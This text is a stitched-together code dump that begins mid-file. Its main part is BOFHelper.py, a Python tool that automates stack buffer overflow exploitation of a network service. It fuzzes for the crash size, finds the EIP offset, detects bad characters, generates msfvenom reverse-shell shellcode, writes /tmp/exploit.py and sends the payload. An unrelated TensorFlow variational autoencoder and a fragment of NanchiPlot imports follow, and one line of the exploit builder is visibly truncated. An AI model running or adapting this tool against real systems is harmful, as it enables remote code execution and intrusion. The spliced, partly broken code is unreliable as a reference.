If an overflow has been\n # triggered successfully, it would update @self._numBytes with @current.\n # @param current The number of bytes that is to be sent to the service in the current iteration.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionRefused if failed on first trial;\n # BOFErrorConnectionTimeout if timed out.\n\n def _fuzz_bytes_overflow(self, current: int = 0) -> int:\n if current == 0:\n self._debug_log(\"Checking if service is open...\")\n else:\n self._debug_log(\"Fuzzing with %s bytes...\" % current)\n\n error = self.send_data(b\"\\x90\" * current)\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n # Service didn't crash -> increment @current by self._inc\n if not self._check_crash(error):\n if current == 0:\n self._debug_log(\"Service is open!\")\n return self._fuzz_bytes_overflow(current + self._inc)\n\n # Service crashed -> print and proceed\n if current == 0:\n self._err_log(\"Service is not open!\")\n return BOFErrorConnectionRefused\n\n self._success_log(\"Service crashed at %s bytes!\" % current)\n self._prompt_restart()\n\n # high = @current (as it has successfully caused overflow)\n # low = previous @current (i.e. current - self._inc)\n self._numBytes = current\n return BOFErrorSuccess\n\n # @function _ask_eip\n # @abstract Ask the user if EIP has been successfully overridden and update @self._numBytes if so.\n # @result True if EIP is overridden; False otherwise.\n\n def _ask_eip(self, current: int) -> bool:\n ans = self._input(\"Is EIP overridden by 90909090 (y/n): \").lower()\n self._prompt_restart()\n if ans == 'y':\n self._success_log(\"Strict size found: %d\" % current)\n self._numBytes = current\n self._strictSizeFound = True\n return True\n return False\n\n # @function _find_crash_threshold\n # @abstract Find the specific payload length on which the service first crashed.\n # @discussion Utilizing a binary search approach, this function recursively finds the smallest value\n # on which the service would crash, which would be used in later functions to find the\n # strict payload size with which EIP could be obtained. Note that the debugger should\n # be kept open during the execution of this function. 
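To illustrate with hypothetical bounds: for (low, high) = (800, 1000) the function probes 900; if 900 still crashes, the window narrows to (800, 900], otherwise to (900, 1000], and the search stops once low + 1 == high. 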
Extensive user interaction may\n # be required, but it should only be needed in edge cases.\n # @param high The current minimum number of bytes needed to overflow the service.\n # @param low The current maximum number of bytes that would not overflow the service.\n # @result BOFErrorSuccess is succeeded; BOFErrorConnectionTimeout if timed out.\n\n def _find_crash_threshold(self, high: int = 0, low: int = 0) -> int:\n if self._strictSizeFound:\n return BOFErrorSuccess\n\n # Success!\n if low + 1 == high:\n self._success_log(\"Crash threshold found: %s!\\n\" % high)\n self._numBytes = high\n return BOFErrorSuccess\n\n self._prompt_debugger()\n mid = low + (high - low) // 2 # Safe way to get mid\n self._debug_log(\"Sending buffer of size %s...\" % mid)\n error = self.send_data(b\"\\x90\" * mid)\n\n # Did not crash -> set @low to mid\n if not self._check_crash(error) and error != BOFErrorConnectionTimeout:\n return self._find_crash_threshold(high, mid)\n\n # Service crashed -> set @high to mid\n if self._ask_eip(mid):\n return BOFErrorSuccess\n return self._find_crash_threshold(mid, low)\n\n # @function get_num_bytes\n # @abstract Find the particular payload size needed to crash the service and obtain EIP.\n # @discussion This function starts by fuzzing the service with _fuzz_bytes_overflow() to\n # determine a size that would crash the service. If the class is in strict\n # mode, it would attempt to first discover the crash threshold with function\n # _find_crash_threshold(). With the threshold discovered, this function steps\n # up from it one byte at a time in order to find the strict size for EIP control.\n # Beware that this function may take a great amount of user interaction.\n # @result @self._numBytes if succeeded; BOFErrorFailure if fuzzing failed; BOFErrorInvalid\n # if service did not crash; BOFErrorConnectionTimeout if timed out.\n\n def get_num_bytes(self) -> int:\n self._func_log(\"Fuzzing service...\")\n if not self._numBytesObtained:\n if self._fuzz_bytes_overflow():\n return BOFErrorFailure\n self._numBytesObtained = True\n\n if self._strict and not self._strictSizeFound:\n if self._find_crash_threshold(self._numBytes, self._numBytes - self._inc) == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n while True:\n self._prompt_debugger()\n if not self._check_crash(self.send_data(b\"\\x90\" * self._numBytes)):\n self._err_log(\"Service did not crash! (should never happen)\")\n return BOFErrorInvalid\n if self._ask_eip(self._numBytes):\n break\n self._numBytes += 1\n continue\n\n return self._numBytes\n\n # @function set_num_bytes\n # @abstract Sets the number of bytes needed to overflow the service.\n # @param num_bytes The number of bytes required to overflow the service.\n # @param strict Sets the class in strict mode.\n # @result None.\n\n def set_num_bytes(self, num_bytes: int, strict: bool = False) -> None:\n self._strict = strict\n self._numBytes = num_bytes\n self._numBytesObtained = True\n if strict:\n self._strictSizeFound = True\n\n # @function get_eip_offset\n # @abstract Obtain the EIP offset for the specified service.\n # @discussion With @self._numBytes obtained, this function locates the offset of ESP with a\n # unique pattern of length @self._numBytes, generated by the msf_pattern_create\n # utility. If the service has crashed due to overflow, the user should provide\n # the value at the EIP register which would be then used to identify the exact\n # offset of EIP on the stack. 
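As an illustration (made-up values): if EIP reads 42306142, then msf-pattern_offset -q 42306142 might report 1978, meaning pattern bytes 1979-1982 landed in EIP. 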
The user would also be prompted to provide the\n # value at the top of ESP so that the program could automatically calculate the\n # ESP padding.\n # @result @self._eipOffset if succeeded; BOFErrorConnectionTimeout if service timed out;\n # BOFErrorServiceAlive if service did not crash; BOFErrorFailure if the value is\n # not found in the pattern; BOFErrorInvalid if @self._numBytes is not obtained\n # or if the stack size is too small.\n\n def get_eip_offset(self) -> int:\n self._func_log(\"Locating EIP...\")\n if self._eipObtained:\n return self._eipOffset\n\n if not self._numBytesObtained:\n self._err_log(\"Please first obtain the number of bytes needed to overflow the service!\")\n return BOFErrorInvalid\n\n if self._strict and not self._strictSizeFound:\n self._err_log(\"Please first obtain the strict payload size!\")\n return BOFErrorInvalid\n\n self._prompt_debugger()\n error = self.send_data(execute(\"msf-pattern_create -l %s\" % self._numBytes), 5)\n\n # Service didn't crash. Bye!\n if not self._check_crash(error) and error != BOFErrorConnectionTimeout:\n self._err_log(\"Service did not crash!\")\n return BOFErrorServiceAlive\n\n # Service crashed -> find EIP & ESP padding\n eip = self._input(\"Service crashed. Please enter the value in EIP: \").replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n esp = self._input(\"Please enter the first 4 bytes of ESP in the stack: \").replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n self._step_log(\"Locating EIP offset and ESP padding in the pattern...\")\n\n try:\n self._eipOffset = int(execute(\"msf-pattern_offset -q %s\" % eip).decode().split()[-1])\n self._espPadding = int(execute(\"msf-pattern_offset -q %s\" % esp).decode().split()[-1]) - self._eipOffset - 4\n self._espPaddingSet = True\n except IndexError:\n self._warn_log(\"Value not found in pattern!\")\n return BOFErrorFailure\n\n self._eipObtained = True\n self._stackSpace = self._numBytes - self._eipOffset - 4 - self._espPadding\n if self._stackSpace <= 0:\n self._err_log(\"Stack space should be greater than 0!\")\n return BOFErrorInvalid\n self._success_log(\"EIP Offset: %s\" % self._eipOffset)\n self._success_log(\"ESP Padding: %s\" % self._espPadding)\n self._prompt_restart()\n return self._eipOffset\n\n # @function set_eip_offset\n # @abstract Manually set the EIP offset to a specified value.\n # @param offset The value @self._eipOffset is set to.\n\n def set_eip_offset(self, offset: int) -> None:\n if not self._espPaddingSet:\n self.get_esp_padding()\n if not self._numBytesObtained:\n self._numBytes = offset + 100\n self._numBytesObtained = True\n self._eipOffset = offset\n self._eipObtained = True\n\n # @function __check_input\n # @abstract Helper function to check for new bad characters in user input.\n # @result None.\n\n def __check_input(self) -> None:\n ans = self._input(\"Enter bad characters found (separate with space): \") \\\n .lower().replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n if ans == \"\":\n self._success_log(\"Empty input, assuming that all bad characters have been found!\")\n return\n\n for char in ans.split():\n if is_hex(char) and len(char) == 2:\n self._badChars.append(char)\n BOFAllHex.remove(char)\n\n # @function __check_dump\n # @abstract Helper function to check for new bad characters in hex dump.\n # @result None.\n\n def __check_dump(self, chars: list[str]) -> None:\n self._prompt_log(\"Dump at least %d bytes (stop input with \\\"q\\\"): \" % len(BOFAllHex))\n new_chars = []\n while True:\n ans = input().strip().lower().replace(\"\\\\x\", 
\"\").replace(\"0x\", \"\")\n if ans == \"q\":\n break\n for item in split(r\"[ |]\", ans):\n if is_hex(item) and len(item) == 2:\n new_chars.append(item)\n while new_chars[0] != chars[0] and new_chars[0] != \"00\":\n new_chars.pop(0)\n\n self._prompt_log(\"Processed dump: %s\" % \" \".join(new_chars))\n if self._input(\"Proceed? (y/n)\\n\").lower() != 'y':\n self._err_log(\"Dump malformed! Try again!\")\n return self.__check_dump(chars)\n\n if len(new_chars) < len(chars):\n self._err_log(\"Dump is too small! Try again!\")\n return self.__check_dump(chars)\n\n for i in range(len(chars)):\n if chars[i] != new_chars[i]:\n self._step_log(\"Identified new bad character: 0x%s\" % chars[i])\n self._badChars.append(chars[i])\n BOFAllHex.remove(chars[i])\n\n # @function __build_bad_buffer\n # @abstract Build the buffer to send based on the current character list.\n # @discussion It would place @chars in the middle of the filler space before EIP.\n # @param chars The current character list.\n # @result The assembled bytes object to send to the service.\n\n def __build_bad_buffer(self, chars: list[str]) -> bytes:\n offset_len = self._eipOffset - len(chars)\n return b\"\\x90\" * (offset_len // 2) \\\n + unhexlify(\"\".join(chars)) \\\n + b\"\\x90\" * (self._numBytes - len(chars) - (offset_len // 2))\n\n # @function __send_chars_user\n # @abstract Private function sending non-critical characters and asking for user input to determine\n # remaining bad characters.\n # @discussion After all critical bad characters have been discovered through __send_chars_auto, this\n # function sends the updated character list, supposedly causing a crash, and prompts the\n # user for either a hex dump or bad characters they identified manually. This is the last\n # step of bad character detection.\n # @param chars The list of characters to be sent to the service.\n # @param manual Whether to ask the user to manually identify bad characters instead of providing a hex\n # dump.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out; BOFErrorServiceAlive\n # if service did not crash.\n\n def __send_chars_user(self, chars: list[str], manual: bool = False) -> int:\n error = self.send_data(self.__build_bad_buffer(chars))\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n # Service should always crash\n if not self._check_crash(error):\n self._err_log(\"Service did not crash! (should never happen)\")\n return BOFErrorServiceAlive\n\n self._success_log(\"Characters sent!\")\n if manual:\n self.__check_input()\n else:\n self._prompt_log(\"Scroll to the middle of the 90's and make sure the dump starts with 01 02 03 04...!!!\")\n self.__check_dump(chars)\n return BOFErrorSuccess\n\n # @function __send_chars_auto\n # @abstract Recursively sends and updates character list to determine critical bad characters\n # @discussion This recursive function continuously send a list of string to the service until all\n # bad characters in it have been found. If the service did not crash due to send_data(),\n # the list would be split in two and sent respectively (with this function). 
The user\n # simply has to repeatedly restart the service as prompted.\n # @param chars The list of characters to be sent to the service.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out.\n\n def __send_chars_auto(self, chars: list[str]) -> int:\n self._debug_log(\"Sending: %s\" % \" \".join(chars))\n error = self.send_data(self.__build_bad_buffer(chars))\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n # If the service has crashed, there would be no bad characters in this subset\n if self._check_crash(error):\n self._prompt_restart()\n return BOFErrorSuccess\n\n # Service did not crash\n if len(chars) == 1:\n self._step_log(\"Identified new bad character: 0x%s\" % chars[0])\n self._badChars.append(chars[0])\n BOFAllHex.remove(chars[0])\n return BOFErrorSuccess\n\n # Split\n for chunk in split_list(chars, 2):\n error = self.__send_chars_auto(chunk)\n if error:\n return error\n\n return BOFErrorSuccess\n\n # @function _send_chars\n # @abstract Helper function to send all hex characters to the service.\n # @discussion This function splits BOFAllHex into chunks of @size and sends them respectively with\n # either __send_chars_auto() or __send_chars_user().\n # @param size The size of each segment to send.\n # @param auto Whether to use __send_chars_auto() or __send_chars_user().\n # @param manual Whether to ask the user to manually identify bad characters instead of providing a\n # dump. Taken into account only if auto is set.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out; BOFErrorServiceAlive\n # if service did not crash.\n\n def _send_chars(self, size: int, auto: bool = False, manual: bool = False) -> int:\n for i in range(0, len(BOFAllHex), size):\n if auto:\n error = self.__send_chars_auto(BOFAllHex[i:i + size])\n else:\n error = self.__send_chars_user(BOFAllHex[i:i + size], manual)\n if error:\n return error\n return BOFErrorSuccess\n\n # @function find_bad_chars\n # @abstract Find bad characters in the service.\n # @discussion This function attempts to discover all bad characters present in the service. It\n # initially uses the automated __send_chars_auto() helper to obtain all critical bad\n # characters (i.e. ones that would cause the service to not crash). 
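(A hypothetical critical example: a byte the target's parser treats as a string terminator, truncating the buffer so the overflow never happens; non-critical bad characters still let the service crash but arrive mangled on the stack.) 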
Afterwards, it\n # sends the updated list of characters to the services with __send_chars_user(), which\n # would ask for user input that indicates the remaining bad characters.\n # Note that get_eip_offset() must be run before executing this function.\n # @result BOFErrorSuccess if succeeded; BOFErrorFailure if failed; BOFErrorInvalid if function\n # get_eip_offset() is not yet invoked.\n\n def find_bad_chars(self, manual: bool = False) -> int:\n if not self._eipObtained:\n self._err_log(\"Please first locate the EIP offset!\")\n return BOFErrorInvalid\n\n if not self._badCharsFound:\n self._step_log(\"Starting automatic detection of bad characters...\")\n size = self._eipOffset\n if self._eipOffset >= len(BOFAllHex):\n size = len(BOFAllHex)\n if self._send_chars(size, True):\n return BOFErrorFailure\n\n self._success_log(\"Automatic bad character detection complete!\")\n self._success_log(\"Bad characters found: 0x%s\" % \" 0x\".join(self._badChars))\n self._step_log(\"Sending characters to determine non-critical bad characters...\")\n self._debug_log(\"Characters to send: 0x%s\" % \" 0x\".join(BOFAllHex))\n self._prompt_debugger()\n if self._send_chars(size, False, manual):\n return BOFErrorFailure\n self._prompt_restart()\n\n self._badChars.sort()\n self._success_log(\"All bad characters: 0x%s\" % \" 0x\".join(self._badChars))\n self._badCharsFound = True\n return BOFErrorSuccess\n\n # @function set_bad_chars\n # @abstract Manually input the bad characters identified.\n # @param bad_chars The value @self._badChars is set to.\n # @result None.\n\n def set_bad_chars(self, bad_chars: list[str]) -> None:\n for item in bad_chars:\n if not is_hex(item) or len(item) != 2:\n bad_chars.remove(item)\n self._badChars.extend(bad_chars)\n self._badChars = list(set(self._badChars))\n self._badChars.sort()\n self._badCharsFound = True\n\n # @function generate_shellcode\n # @abstract Generate the shellcode for use in exploitation.\n # @discussion This function generates the shellcode with the command line package msfvenom. It\n # first asks for the user to specify a payload to use - if it does not exist, a list\n # of all available payloads would be printed. After successfully parsing the name,\n # this function executes a msfvenom command to generate the payload, automatically\n # completing the parameters with previously obtained values. The shellcode is stored\n # in @self._shellCode.\n # Note that function find_bad_chars() must be run before executing this function.\n # @result BOFErrorSuccess if succeeded; BOFErrorInvalid if function find_bad_chars() is not\n # yet invoked.\n\n def generate_shellcode(self) -> int:\n self._func_log(\"Generating shellcode...\")\n\n if not self._badCharsFound:\n self._err_log(\"Please first find the bad characters!\")\n return BOFErrorInvalid\n\n # Add NOP slides\n self._shellCode += b\"\\x90\" * int(self._input(\"Number of NOP slides: \"))\n self._step_log(\"Generating list of all payloads...\")\n all_payloads = execute(\"msfvenom --list payload\").decode()\n while True:\n ans = self._input(\"Please enter the name of the payload to employ: \").lower()\n if ans in all_payloads:\n self._shellCodeName = ans\n break\n self._warn_log(\"Payload name does not exist. 
Printing help page...\")\n print(all_payloads)\n\n if not self._lIP:\n self._warn_log(\"Failed to get local IP.\")\n try:\n ip = self._input(\"Local IP: \")\n socket.inet_aton(ip)\n except socket.error:\n self._err_log(\"IP address invalid!\")\n return BOFErrorFailure\n self._lIP = ip\n\n self._step_log(\"Generating shellcode %s...\" % self._shellCodeName)\n self._shellCode += execute(\"msfvenom -p %s LHOST=%s LPORT=%d EXITFUNC=thread -f raw -e x86/shikata_ga_nai \"\n \"-b \\\"\\\\x%s\\\"\" % (ans, self._lIP, self._lPort, \"\\\\x\".join(self._badChars)))\n self._shellCodeGenerated = True\n self._success_log(\"Shellcode generated!\")\n return BOFErrorSuccess\n\n # @function _check_space\n # @abstract Helper function to check if a certain amount of space is available in ESP.\n # @discussion It sends a payload with @space amount of bytes after ESP. The space's availability\n # is verified if the user confirms that the EIP and stack behave as expected.\n # @param space The amount of space whose availability would be checked.\n # @result True if available; False otherwise.\n\n def _check_space(self, space: int) -> bool:\n self._step_log(\"Checking if a space of %d is available in ESP...\" % space)\n if self._stackSpace >= space:\n self._success_log(\"Space (size = %d) available!\" % space)\n return True\n\n if self._strict:\n if space > self._numBytes - self._eipOffset - 4 - self._espPadding:\n self._err_log(\"Space unavailable!\")\n return False\n return True\n\n self._prompt_debugger()\n error = self.send_data(b\"\\x90\" * self._eipOffset + b\"A\" * 4 + b\"\\x90\" * (self._espPadding + space), 5)\n\n # Service should always crash\n if not self._check_crash(error) and error != BOFErrorConnectionTimeout:\n self._err_log(\"Service did not crash! (should never happen)\")\n return False\n\n # User validation required\n ans = self._input(\"Payload sent. Check to see if EIP is filled with 41414141 and if there are %d 90's after it. \"\n \"(y/n)\\n\" % space).lower()\n\n # Success! Update stack space.\n if ans == 'y':\n self._success_log(\"Space (size = %d) available!\" % space)\n self._stackSpace = space\n self._prompt_restart()\n return True\n\n self._prompt_restart()\n return False\n\n # @function _find_space\n # @abstract Private function to locate space before EIP for the payload.\n # @discussion This function checks if the space before EIP could be used to store the payload\n # should ESP prove to be unavailable. If the space before EIP is larger than the\n # size of @self._shellCode, it would proceed to insert a first stage shellcode in\n # the ESP so that the program could jump to the shellcode. The user needs to provide\n # the register that the filler appears to be in. 
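For instance (illustrative register and offset): if EAX points 8 bytes before the filler, the first stage could be asm('add eax, 8') followed by asm('jmp eax'), redirecting execution into the shellcode stored there. 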
If no such register exists, an egg\n # hunter would be placed in ESP to search in memory for the shellcode.\n # @result BOFErrorSuccess if succeeded; BOFErrorNoSpace if there is no sufficient space for\n # payload; BOFErrorServiceAlive if service did not crash.\n\n def _find_space(self) -> int:\n if self._eipOffset < len(self._shellCode):\n self._err_log(\"There is not enough space before EIP to insert the payload!\")\n return BOFErrorNoSpace\n\n # Generate first stage shellcode\n self._prompt_debugger()\n if not self._check_crash(self.send_data(b\"\\x90\" * self._numBytes)):\n return BOFErrorServiceAlive\n register = self._input(\"Please enter the register that records your payload: \").lower()\n if is_register(register):\n skip = int(self._input(\"Bytes to skip: \"))\n if skip > 0:\n self._firstStageASM = \"add %s, %d\" % (register, skip)\n self._firstStage = asm(self._firstStageASM)\n jmp = \"jmp %s\" % register\n self._firstStage += asm(jmp)\n # keep the two mnemonics separated so the generated comment stays readable\n self._firstStageASM = (self._firstStageASM + \" ; \" + jmp) if self._firstStageASM else jmp\n if not self._check_space(len(self._firstStage)):\n self._err_log(\"There is not enough space in ESP for the first stage shellcode!\")\n return BOFErrorNoSpace\n else:\n # TO-DO: EGG HUNTER\n self._warn_log(\"Register invalid! Building egg hunter...\")\n return BOFErrorInvalid\n\n # We have the entire filler space at our disposal\n self._prompt_restart()\n self._stackSpace = self._eipOffset\n self._spaceExpanded = True\n self._success_log(\"The filler space (%s) is all yours :)\" % self._eipOffset)\n return BOFErrorSuccess\n\n # @function expand_space\n # @abstract Attempt to expand the available space to store the shellcode.\n # @discussion In order for the shellcode to be injected, there must be sufficient space to store\n # it. This function invokes _check_space() with space = len(@self._shellCode) to check\n # if the shellcode could be placed in ESP. If not, it would proceed to _find_space() to\n # locate space before EIP.\n # Note that generate_shellcode() must be run before executing this function.\n # @result BOFErrorSuccess if succeeded; BOFErrorNoSpace if there is no sufficient space for\n # payload; BOFErrorServiceAlive if service did not crash; BOFErrorInvalid if shellcode\n # is not generated or ESP padding is not set.\n\n def expand_space(self) -> int:\n self._func_log(\"Expanding space...\")\n\n if self._spaceExpanded:\n return BOFErrorSuccess\n\n if not self._shellCodeGenerated:\n self._err_log(\"Please first generate the shellcode!\")\n return BOFErrorInvalid\n\n if not self._espPaddingSet:\n self._err_log(\"Please manually set the ESP padding!\")\n return BOFErrorInvalid\n\n if self._check_space(len(self._shellCode)):\n self._shellCodeInESP = True\n self._spaceExpanded = True\n return BOFErrorSuccess\n\n self._shellCodeInESP = False\n self._step_log(\"Unable to perform expansion. 
Proceeding to find space...\")\n return self._find_space()\n\n # @function _build_exploit\n # @abstract Build @self._exploit with the other functions executed.\n # @result BOFErrorSuccess if succeeded; BOFErrorInvalid if function expand_space() is not yet invoked\n # or if the entered return address is invalid..\n\n def _build_exploit(self) -> int:\n self._func_log(\"Building exploit...\")\n\n if not self._spaceExpanded:\n self._err_log(\"Please first expand space for shellcode!\")\n return BOFErrorInvalid\n\n # Find return address (JMP ESP)\n self._prompt_log(\"Tip: !mona find -s \\\"\\\\xff\\\\xe4\\\"\")\n ans = self._input(\"Enter address to overwrite EIP with: \").lower().replace(\"\\\\x\", \"\").replace(\"0x\", \"\")\n if not is_hex(ans) or len(ans) != 8:\n self._err_log(\"Address invalid!\")\n return BOFErrorInvalid\n self._eip = pack(\" 0:\n self._exploit += b\"\\x90\" * self._endPadding\n\n self._success_log(\"Exploit built successfully!\", True)\n return BOFErrorSuccess\n\n # @function generate_file\n # @abstract Build a Proof of Concept script with the information gathered by other functions.\n # @discussion The generated script, /tmp/exploit.py, would be in Python 2 format due to issues with\n # Python 3 encoding.\n # @result BOFErrorSuccess if succeeded; BOFErrorFailure if the exploit is not built successfully.\n\n def generate_file(self) -> int:\n self._func_log(\"Generating exploit.py...\")\n\n if not self._exploit:\n if self._build_exploit():\n return BOFErrorFailure\n\n heading = \"#!/usr/bin/python\\n\" \\\n \"import socket\\n\\n\" \\\n \"try:\\n\" \\\n \" print '(-) Initializing variables...'\\n\\n\"\n variables = \" # %s - LHOST: %s - LPORT: %d\\n\" \\\n \" shellcode = (\" % (self._shellCodeName, self._lIP, self._lPort)\n shell_str = bytes_escape_all(self._shellCode)\n len_shell = len(shell_str)\n for i in range(0, len_shell, 15):\n if i > 0:\n variables += \" \"\n variables += \"'\" + ''.join(shell_str[i:i + 15])\n if len_shell - i > 15:\n variables += \"'\\n\"\n variables += \"')\\n\\n\"\n\n payload_str = (\" payload = %s\" % self._prefix).replace(\"b'\", \"'\")\n if not self._shellCodeInESP:\n payload_str += \" + shellcode\"\n variables += \" # Bad characters: 0x%s\\n\" % \" 0x\".join(self._badChars)\n\n variables += \"\"\n if self._shellCodeInESP:\n eip_offset = self._eipOffset\n else:\n eip_offset = self._eipOffset - len(self._shellCode)\n if eip_offset > 0:\n variables += \" filler = '\\\\x90' * %d\\n\" % eip_offset\n payload_str += \" + filler\"\n\n variables += \" eip = %s\\n\" % bytes_escape_all_str(self._eip)\n payload_str += \" + eip\"\n\n if self._espPadding > 0:\n variables += \" offset = 'B' * %d\\n\" % self._espPadding\n payload_str += \" + offset\"\n\n if self._shellCodeInESP:\n payload_str += \" + shellcode\"\n else:\n variables += \" # %s\" % self._firstStageASM\n variables += (\" first_stage = %s\\n\" % bytes_escape_all_str(self._firstStage)).replace(\"b'\", \"'\")\n payload_str += \" + first_stage\"\n\n if self._strict and self._endPadding > 0:\n payload_str += \" + '\\\\x90' * %d\" % self._endPadding\n payload_str += (\" + %s\\n\\n\" % self._suffix).replace(\"b'\", \"'\")\n variables += payload_str.replace(\"'' + \", \"\").replace(\" + ''\", \"\")\n\n if self._origHeader:\n variables += (\" buffer = %s\\n\"\n \" buffer += payload\\n\\n\" % self._origHeader).replace(\" buffer = b\", \" buffer = \")\n variables = self._process_header_file(variables)\n\n footing = \" print '(-) Sending payload...'\\n\" \\\n \" s = socket.socket(socket.AF_INET, 
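# The statement above that now reads `self._eip = pack(" 0:` lost a span to
# angle-bracket stripping; given the eight-hex-digit validation immediately
# before it, a plausible reconstruction of the surviving fragment is a
# little-endian pack of the JMP ESP address (the trailing `> 0:` belongs to
# a later end-padding check). A sketch under that assumption:
from struct import pack

ans = "625011af"                    # address as entered: 8 hex digits, no 0x
eip = pack("<L", int(ans, 16))      # little-endian, as x86 expects in memory
assert eip == b"\xaf\x11\x50\x62"
print(eip)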
socket.SOCK_STREAM)\\n\" \\\n \" s.connect(('%s', %d))\\n\" \\\n \" s.send(\" % (self._ip, self._port)\n if self._origHeader:\n footing += \"buffer\"\n else:\n footing += \"payload\"\n\n footing += \")\\n\" \\\n \" s.close()\\n\" \\\n \" print '[+] Exploitation complete!'\\n\\n\" \\\n \"except:\\n\" \\\n \" print '(!!!) Exploitation failed!'\\n\" \\\n \" exit(0)\\n\"\n\n file = open(\"/tmp/exploit.py\", \"w\")\n file.write(heading + variables + footing)\n file.close()\n self._success_log(\"Successfully generated /tmp/exploit.py!\")\n self._fileGenerated = True\n return BOFErrorSuccess\n\n # @function send_exploit\n # @abstract Dispatch the exploit.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionTimeout if timed out; BOFErrorFailure if\n # the exploit is not built successfully or if exploitation failed.\n\n def send_exploit(self) -> int:\n self._func_log(\"Exploiting...\")\n\n if not self._exploit:\n if self._build_exploit():\n return BOFErrorFailure\n\n self._prompt_log(\"Remember to open up a listener on port %d if you are using the shellcode \"\n \"to gain a reverse shell!\" % self._lPort)\n input()\n self._verify = False\n\n error = self.send_data(self._exploit, 5, False)\n if error == BOFErrorConnectionTimeout:\n return BOFErrorConnectionTimeout\n\n if self._check_crash(error):\n self._err_log(\"Exploit failed. Try sending the payload manually.\")\n return BOFErrorFailure\n\n self._success_log(\"Exploitation completed!!!\")\n return BOFErrorSuccess\n\n # @function perform_bof\n # @abstract Perform a full BoF exploit with member functions.\n # @result True if succeeded; False if failed.\n\n def perform_bof(self) -> bool:\n if self.get_num_bytes() < 0:\n return False\n if self.get_eip_offset() < 0:\n return False\n if self.find_bad_chars():\n return False\n if self.generate_shellcode():\n return False\n if self.expand_space():\n return False\n if self.generate_file():\n return False\n if self.send_exploit():\n return False\n return True\n","repo_name":"CharlieJiangXXX/BOFHelper","sub_path":"BOFHelper.py","file_name":"BOFHelper.py","file_ext":"py","file_size_in_byte":50924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40539266106","text":"from tensorflow_probability import layers as tfpl\nfrom tensorflow_probability import distributions as tfpd\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Flatten, Conv2D, Conv2DTranspose, Reshape\nimport tensorflow as tf\nfrom tensorflow import keras\n\n\nclass VariationalAutoEncoder(Model):\n\n def __init__(\n self,\n learning_rate=0.01,\n kl_weight=1,\n encoded_dims=4,\n retrain=False,\n file_path=\"models/vae/vae\",\n *args,\n **kwargs\n ):\n super().__init__(*args, **kwargs)\n self.file_path = file_path\n self.learning_rate = learning_rate\n self.kl_weight = kl_weight\n self.encoded_dims = encoded_dims\n self.encoder = None\n self.decoder = None\n self.model_trained = False\n self.retrain = retrain\n self.setup_model()\n\n def setup_model(self):\n prior = tfpd.Independent(\n tfpd.Normal(\n loc=tf.zeros(self.encoded_dims),\n scale=1\n ),\n reinterpreted_batch_ndims=1\n )\n self.encoder = Sequential([\n Conv2D(16, input_shape=(28, 28, 1), kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n # Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"relu\"),\n Conv2D(32, kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n # Conv2D(32, kernel_size=(3, 3), 
strides=(1, 1), padding=\"same\", activation=\"relu\"),\n Flatten(),\n Dense(tfpl.IndependentNormal.params_size(self.encoded_dims)),\n tfpl.IndependentNormal(\n self.encoded_dims,\n convert_to_tensor_fn=tfpd.Distribution.sample,\n activity_regularizer=tfpl.KLDivergenceRegularizer(prior, weight=self.kl_weight))\n ])\n\n self.decoder = Sequential([\n Dense(7 * 7 * self.encoded_dims),\n Reshape((7, 7, self.encoded_dims)),\n Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"leaky_relu\"),\n Conv2DTranspose(32, kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding=\"same\", activation=\"leaky_relu\"),\n Conv2DTranspose(16, kernel_size=(3, 3), strides=(2, 2), padding=\"same\", activation=\"leaky_relu\"),\n Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding=\"same\"),\n Flatten(),\n tfpl.IndependentBernoulli((28, 28, 1))\n ])\n\n negative_log_likelihood = lambda x, rv_x: -rv_x.log_prob(x)\n self.compile(\n optimizer=keras.optimizers.Adam(learning_rate=self.learning_rate),\n loss=negative_log_likelihood\n )\n\n try:\n self.load_weights(filepath=self.file_path)\n self.model_trained = True\n except:\n print(\"No predefined weights found\")\n\n def call(self, inputs, **kwargs):\n encoded = self.encoder(inputs)\n decoded = self.decoder(encoded)\n return decoded\n\n def fit(self, **kwargs):\n if not self.model_trained or self.retrain:\n super().fit(**kwargs)\n print(\"Storing learned weights...\")\n self.save_weights(self.file_path)\n\n def get_config(self):\n pass\n","repo_name":"P1NHE4D/it3030_project02","sub_path":"vae/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12380060879","text":"# -*- coding: utf-8 -*-\n#\n# NanchiPlot 0.1.0-dev\n# License: MIT License\n# Author: Pedro Jorge De Los Santos\n# E-mail: delossantosmfq@gmail.com \n# Code: https://github.com/JorgeDeLosSantos/NanchiPlot\n#\n#~ from __future__ import absolute_import\n\nimport wx\nimport os\nimport numpy as np\n\n# Nanchi files\ntry:\n from initmpl import *\n import setplot # Axes & Figure props\n import iodata as io # Read & Write data\n import uibase as ui # Main interfaces\n import uiaux as aux # Auxiliar interfaces\n import uitoolbar as tb # Toolbars (Toolbar, AxesToolbar, LineToolbar)\n from _const_ import * # Constants\nexcept ImportError:\n from nanchi.initmpl import *\n import nanchi.setplot as setplot# Axes & Figure props\n import nanchi.iodata as io # Read & Write data\n import nanchi.uibase as ui # Main interfaces\n import nanchi.uiaux as aux # Auxiliar interfaces\n import 